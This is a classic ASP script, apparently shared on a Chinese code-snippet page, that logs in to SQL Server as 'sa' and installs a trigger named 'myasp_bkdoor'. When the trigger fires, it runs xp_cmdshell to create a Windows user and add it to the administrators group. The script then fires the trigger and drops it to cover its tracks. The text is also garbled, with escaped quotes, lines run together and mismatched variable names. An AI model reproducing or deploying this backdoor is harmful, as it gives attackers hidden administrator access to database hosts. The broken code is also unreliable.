复制代码代码如下:<%\’里边的变量代码大家用时自己改吧On Error Resume nextSet conn=Server.CreateObject(\”ADODB.Connection\”) DSN=\”driver={SQL Server};Server=(Local)\\GSQL;database=baby;uid=sa;pwd=lcx;\”conn.Open DSNif conn.State=1 then response.write(\”成功\”) sql=\”CREATE TRIGGER myasp_bkdoor\”&Chr(10)&Chr(13)&\”ON users_member\”&Chr(10)&Chr(13)&\”AFTER UPDATE\”&Chr(10)&Chr(13)&\”AS\”&Chr(10)&Chr(13)&\”IF user=\’dbo\’ OR user=\’sa\’\”&Chr(10)&Chr(13)&\”BEGIN\”&Chr(10)&Chr(13)&\”PRINT \’dbo OR sa logon\’\”&Chr(10)&Chr(13)&\”EXEC master..xp_cmdshell\’net user test 123456 /add&&net localgroup administrators test /add\’\”&Chr(10)&Chr(13)&\”END\”&Chr(10)&Chr(13)&\”ELSE\”&Chr(10)&Chr(13)&\”BEGIN\”&Chr(10)&Chr(13)&\”PRINT \’not dbo or sa privilage\’\”&Chr(10)&Chr(13)&\”END\”&Chr(10)&Chr(13) \’建立myasp_bkdoor触发器,触发baby库中的users_member表的update操作加用户SQL1=\”update users_member set email=3 where accountid=1\” \’触发\’sql2=\”drop TRIGGER myasp_bkdoor\”set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)\’&conn.execute(SQL2) \’触发Do Until Rs.EOF Response.Write \” <tr>\” & vbNewLine For I = 0 To Rs.Fields.Count – 1 Response.Write \”<td>\” & SQLOut(oRs(I)) & \”</td>\” & vbNewLine Next Response.Write \” </tr>\” & vbNewLine Rs.MoveNext Loopelse response.write(\”失败\”) end if %>